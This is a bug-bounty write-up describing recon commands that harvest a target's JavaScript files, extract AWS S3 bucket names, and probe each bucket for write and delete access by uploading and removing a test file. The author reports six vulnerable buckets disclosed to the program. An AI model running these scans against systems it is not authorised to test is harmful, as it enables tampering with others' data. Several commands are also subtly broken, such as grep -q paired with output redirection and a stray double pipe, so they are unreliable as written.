How I was able Find mass leaked AWS s3 bucket from js File

3 years ago 185
BOOK THIS SPACE FOR AD
ARTICLE AD

Santosh Kumar Sha (@killmongar1996)

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be describing How I was able Find mass leaked AWS s3 bucket from js File.

Don’t go outside without any reason . Stay home be safe and also safe other. Special request to my fellow bug-bounty hunter Take care of your health and get vaccinated.

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.

This is the write of my Recent bug that i found . While I was doing recon on js file. How I was able Find mass leaked AWS s3 bucket from js File.

Suppose we assume the target name is example.com where every thing is in-scope like this:

In-scope : *.example.com

To gather all the subdomain from internet archives i have used subfinder , waybackurls tool and gau.

subfinder -d example.com silent | httpx |subjs

gau -subs example.com | grep ‘.js$’

waybackurls example.com | grep ‘.js$’

So the chance of missing the js file still exist so in-order to be ahead of the game I don’t want to miss any js file for testing so I used subfinder and pipe to waybackurls to get all the js file for all the subdomain if exist and save it to a file.

gau -subs example.com | grep ‘.js$’ >> vul1.txt

waybackurls example.com | grep ‘.js$’ >> vul2.txt

subfinder -d example.com -silent | | httpx |subjs>> vul3.txt

Now collecting all js file in one and sorting out the duplicates

Now as js file has a huge resource of data and doing js file recon is an time consume task to filter out the information the target. As files are huge any read each js file one after another is an impossible task. So the used my bash skill to extraction data from each file.I used curl command to read each file and grep out any leaked AWS s3 bucket leaked in that. SO the syntax i used was like this below

cat vul3.txt | xargs -I% bash -c ‘curl -sk “%” | grep -q “s3.amazonaws.com”’ >> s3_bucket.txt

cat vul3.txt | xargs -I% bash -c ‘curl -sk “%” | grep -q “s3.us-east-2.amazonaws.com”’ >> s3_bucket.txt

Now I collected all the aws s3 bucket url and then saved it to a file as s3_bucket.txt.

Now once we have all the s3 aws bucket url then we will collect the s3 buck name. Below is the command to get all the s3 bucket name from the url.

cat s3_bucket.txt | sed ‘s/s3.amazonaws.com//’ >> bucket_name.txt

cat s3_bucket.txt | sed ‘s/s3.us-east-2.amazonaws.com//’ >> bucket_name.txt

So there how i was able to automate the AWS s3 bucket scanning process for write and delete permission.

As I have already collected the s3 bucket from js file and stored it on a file name as “bucket_name.txt”.

Now using aws cli command we will automated the process:

cat bucket_name.txt |xargs -I% sh -c ‘aws s3 cp test.txt s3://%” 2>&1 | grep “uploaded” && echo “ AWS s3 bucket takeover by cli %”’

cat bucket_name.txt |xargs -I% sh -c ‘aws s3 rm test.txt s3://%/test.txt” 2>&1 | grep “deleted” && echo “ AWS s3 bucket takeover by cli %”’

I Finally got 6 more aws s3 bucket with with write and delete permission.

I quickly reported the bug and in the next day the report was triage to critical

After seeing this my reaction …

Takeaway

I’m sure that a lot of security researcher had already see there process but this How I approach to Find mass leaked AWS s3 bucket from js File. So doing recon is pretty handle you may not what your missing out.

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

https://www.buymeacoffee.com/killmongar1996
Read Entire Article